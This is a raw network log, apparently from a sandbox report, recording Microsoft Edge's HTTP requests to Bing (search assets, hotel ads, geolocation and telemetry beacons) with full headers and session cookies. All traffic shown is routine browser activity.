cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f100d6
GET

https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.1.2/js/widget.js?t=241204

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /rewardsapp/widgetassets/prod/medallion/1.1.2/js/widget.js?t=241204 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

content-type: application/json
access-control-allow-origin: *
cache-control: public, max-age=21600
content-encoding: br
last-modified: Wed, 13 Nov 2024 18:09:46 GMT
vary: Accept-Encoding
x-ms-request-id: 70c7d939-f01e-005e-1d22-468c6b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref: 20241204T080000Z-177857f6bd4qsxndhC1DB1yrpn00000004vg0000000079xb
x-fd-int-roxy-purgeid: 0
x-cache-info: L2_T2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
x-ceto-ref: 67500c0062234e6d9c070ac98c935eea|AFD:67500c0062234e6d9c070ac98c935eea|2024-12-04T08:00:00.781Z
content-length: 48833
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f10132
GET

https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0

Response

HTTP/2.0 200

expires: Wed, 27 Nov 2024 23:13:26 GMT
last-modified: Tue, 24 Sep 2024 06:45:05 GMT
etag: 0x8DCDC646C9AF5F4
cache-control: public, no-transform, max-age=209306
content-length: 1929
content-type: image/png
content-md5: TBVfy13T2kZEUa0kC23mBg==
x-ms-request-id: 1d60634c-401e-0052-2736-1bf762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a5777b5c.1728579933.132940b9
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
timing-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f1013b
GET

https://www.bing.com/local/hotelads?q=onjon&inDate=01/19/2025&outDate=01/20/2025&entityid=YN2000x1190976147452155201,YN1545x256073263,YN2000x6096471577638952817,YN2000x1190976147452155201,YN1544x243384812,YN2000x9391523170225958935,YN2000x4457774376323358039,YN2000x10959879645415552720,YN2000x11722354772439687545&IID=5672&source=serpls&usrd=false&frt=json&form=ANAB01&pc=U531&originig=5AD7030C91584719B4F5E41231459495&IG=5AD7030C91584719B4F5E41231459495

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /local/hotelads?q=onjon&inDate=01/19/2025&outDate=01/20/2025&entityid=YN2000x1190976147452155201,YN1545x256073263,YN2000x6096471577638952817,YN2000x1190976147452155201,YN1544x243384812,YN2000x9391523170225958935,YN2000x4457774376323358039,YN2000x10959879645415552720,YN2000x11722354772439687545&IID=5672&source=serpls&usrd=false&frt=json&form=ANAB01&pc=U531&originig=5AD7030C91584719B4F5E41231459495&IG=5AD7030C91584719B4F5E41231459495 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a0e42414ed8961a555f8d8744fb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Bt6zpSjz/y3pJ+1O2Ndh/IeWFbzbBF98xYtDYCKRV1c='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: AF011BC2AD6F4268876E6C4151FAD284 Ref B: LON212050706025 Ref C: 2024-12-04T10:08:14Z
date: Wed, 04 Dec 2024 10:08:14 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:14 GMT; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:14 GMT; path=/; secure; SameSite=None
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:14 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f1014e
POST

https://www.bing.com/travelhotelrentalpackages/api/v1/hotel/providerpricelist?IG=5AD7030C91584719B4F5E41231459495&IID=5672

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /travelhotelrentalpackages/api/v1/hotel/providerpricelist?IG=5AD7030C91584719B4F5E41231459495&IID=5672 HTTP/2.0
host: www.bing.com
content-length: 535
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/json
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f101bc
GET

https://www.bing.com/geolocation/write?isDevLoc=false&lat=51.519901275634766&lon=-0.10880059748888016&dispName=London%252C%2520Greater%2520London&isEff=1&effLocType=1&clientsid=undefined

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /geolocation/write?isDevLoc=false&lat=51.519901275634766&lon=-0.10880059748888016&dispName=London%252C%2520Greater%2520London&isEff=1&effLocType=1&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f101bd
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306885327%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.5%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306885327%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885341%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885344%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306885327%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.5%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306885327%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885341%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885344%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f101bb
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885345%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885345%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f101c4
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

